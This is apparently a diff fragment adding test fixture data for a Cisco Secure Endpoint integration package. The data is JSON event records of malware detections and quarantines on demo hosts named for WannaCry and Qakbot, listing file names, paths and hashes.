+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 1eb4eaf974b..7fa4df7018a 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -34,7 +34,7 @@ 